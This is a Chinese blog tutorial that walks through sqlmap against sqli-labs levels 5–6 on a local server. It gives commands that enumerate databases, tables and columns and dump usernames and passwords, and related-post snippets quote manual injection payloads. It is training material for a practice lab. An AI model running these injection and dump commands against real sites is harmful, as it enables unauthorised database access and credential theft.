(sqlmap)【sqli-labs5-6】GET方法、单双引号、报错注入

已于 2022-07-07 16:33:27 修改
阅读量896 收藏 6
点赞数 1
分类专栏: # 【全】sqlil-abs靶场 文章标签: mysql 数据库 database
于 2022-05-29 17:12:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125023495
版权

目录

 推荐:

一、错误注入(sqlmap)SQL注入基本步骤:

二、扩展

2.1、命令扩展

2.2、注:

2.3、推荐:

三、Less5(GET-Double injection-Single Quotes -String)

 3.1、第一步:检测是否存在注入

基础操作

3.2、第二步:爆数据库名

命令

基础操作

3.3、第三步:爆数据库表名

命令

基础操作

3.4、第四步:爆字段名

命令:

基础操作

3.5、第五步:爆数据

命令:

基础操作:

 推荐:

【SQL注入-可回显】报错注入:简介、相关函数、利用方法icon-default.png?t=M5H6https://blog.csdn.net/qq_53079406/article/details/125017089?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165718272016782390523827%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165718272016782390523827&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125017089-null-null.185^v2^control&utm_term=%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4450

一、错误注入(sqlmap)SQL注入基本步骤:

第一步:注入点测试

第二步:爆数据库名

第三步:爆数据库表

第四步:爆字段

第五步:爆数据

二、扩展

2.1、命令扩展

(1)如果提前找到了数据库类型

--dbms +数据库

(2)扫描的等级

最高等级是

--leve=5 --risk=3

2.2、注:

我使用Windows中的sqlmap做,会带上python sqlmap.py

Linux:直接sqlmap +……

2.3、推荐:

(手工)【sqllabs5-6】GET方法、单双引号、报错注入:基本步骤、错误注入过程https://blog.csdn.net/qq_53079406/article/details/125015773?spm=1001.2014.3001.5501

三、Less5(GET-Double injection-Single Quotes -String)

 3.1、第一步:检测是否存在注入

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch

--batch是使用默认设置

其实环境都扫出来了 

就可以再加上--dbms mysql了

3.2、第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

 

3.3、第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB --tables --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

 

3.4、第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

3.5、第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch

基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

 

注:

(5-6关基本类似,就以第五关为例)

黑色地带(崛起)
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqlmap对pikachu的GET请求注入漏洞测试
weixin_62943062的博客
07-12 3297
Sqlmap对pikachu的GET请求注入漏洞测试
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入、引号、双引号、括号闭合、字符型、整型
05-26 980
sqllabs靶场】sqlmap
sql注入原理及各姿势sqlmap使用
最新发布
2401_84281748的博客
05-17 615
三、判断数据显示点?id=-1’ union select 1,2,3 --+ //可以把注入点改为负数或零达到注释前半段语句的效果四、显示用户和数据库名五、查看所有表六、查看表里的所有列七、查看字段值。
sqlmap报错注入
weixin_44110913的博客
04-07 3700
0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成。 所有的注入原理都是一样,即用户输入被拼接执行。但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入。 0x01概念 报错型注入的利用大概有以下3种方式: 复制代码 1:?id=2’ and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (...
SQL 注入之报错及盲注及使用sqlmap 注入
weixin_52281518的博客
02-11 4006
报错注入 报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中 Updatexml() 函数用法:updatexml(XML_document,XPath_string,new_value); XML_document 是String格式,为XML文档对象的名称,中文名为Doc XPath_string XPath格式的字符串 new_value String格式,替换查找到的符合条件的数据 我们通常在第二个xpath参数填写我们要查询的内容。 Up
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 6020
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-labs.rar
12-22
sqli-labs提供了多个级别的挑战,从基础的错误注入到更复杂的盲注、时间基注入、联合查询等,每个级别都设计了特定的漏洞,让学习者逐步掌握SQL注入的原理和防御方法。 学习过程中,你需要理解以下概念: - SQL语法...
sqli-labs-master.zip
05-26
Sqli-labs是专为学习SQL注入而设计的实战教程,由印度程序员创建,提供了一系列逐步升级的挑战,帮助用户从基础到高级理解SQL注入的原理和防御方法。在这个"SQL注入教程"中,你可以通过参与不同级别的实验,深入理解...
sqli-labs-master
08-22
3. 多种注入技术:sqli-labs涵盖了不同的注入技术,如盲注(Blind SQL Injection)、时间延迟注入(Time-Based SQL Injection)、报错注入(Error-Based SQL Injection)和堆叠查询注入(Stacked Queries Injection...
sqli-labs.zip
12-31
5. **工具使用**:可能介绍一些常用的SQL注入工具,如Burp Suite、SQLMap、Nmap等,以及如何使用它们来自动化检测和利用SQL注入漏洞。 6. **环境搭建**:压缩包可能提供了快速搭建实验环境的指南,帮助学习者在本地...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
SQLi-LABS Page-1(Basic Challenges)
07-24
在"SQLi-LABS Page-1 (Basic Challenges)"中,一系列的关卡设计用于帮助学习者理解并实践SQL注入的基本概念和方法。 在CTF(Capture The Flag)网络安全挑战赛中,SQL注入是一种常见的技能测试。在这个挑战中,从...
mysql注入-sqlilabs靶场注入
10-15
SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些关卡,你可以理解不同类型的SQL注入漏洞,并学习如何检测和利用它们。 ...
sqli-labs-master-注入学习靶机
01-19
`sqli-labs-master-注入学习靶机` 提供了一个模拟环境,帮助学习者深入理解SQL注入的工作原理,并提供实践机会来熟悉防御策略。 这个靶机教程由印度开发者创建,旨在帮助用户掌握SQL注入攻击的不同类型,以及如何...
sqli-lib64关闯关笔记学习资料.zip
08-22
6. 工具使用:熟悉Burp Suite、sqlmap等工具在SQL注入检测和漏洞利用中的应用。 7. 安全编码实践:学习如何编写安全的SQL查询,避免动态SQL和直接拼接字符串。 8. 日志分析:学会通过日志分析发现和追踪SQL注入活动...
sqlmap中的get注入
weixin_45711977的博客
06-27 1443
sqlmap
某次报错注入到自定义sqlmap的payload全过程
weixin_40418457的博客
07-16 2020
#0x01 登录框存在sql注入: 通过前期的信息搜集,发现站点使用thinkphp3.2版本的框架,在登录页面验证存在sql注入: 成功读取到数据库版本: #0x02 尝试通过手工注入获取后台账号 遗憾的是sqlmap连注入都识别不出: –proxy=http://127.0.0.1:8080,将sqlmap的流量转发到burp分析payload,发现sqlmap发出的包多加了一个AND: 换手工注入: 查表名payload:extractvalue**(1,concat(0x7e,(selec
初学Web安全之sql注入(二)——报错注入
weixin_47531846的博客
11-20 688
知识补充: 前一篇提到了如何判断字符型与数字型以及字符型的闭合,不过在做sqli-labs靶场时,出现了id=(‘1’),甚至还有id=((‘1’))这样双括号包裹的,在这里笔者也是没想到,不过正常来说,开发人员是不会使用这种的,所以前篇提到的引号双引号判断法,还是有用的。 其实页面有回显,判断出数字型以及字符型还有闭合,还是相对简的,下面拿靶场举列 上图,我们将报错信息拿出来分析一下: ''1'' LIMIT 0,1' 将最外面的包裹引号去掉: '1'' LIMIT 0, 不难看出,我们输
sqlmapsqli-labs21
11-08
因此,sqlmap可以用于对sqli-labs中的SQL注入漏洞进行检测和利用。 引用中的命令是用于获取security数据库中users表中的password和username字段的数据,其中-u参数指定了目标URL,--level和--risk参数指定了检测的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值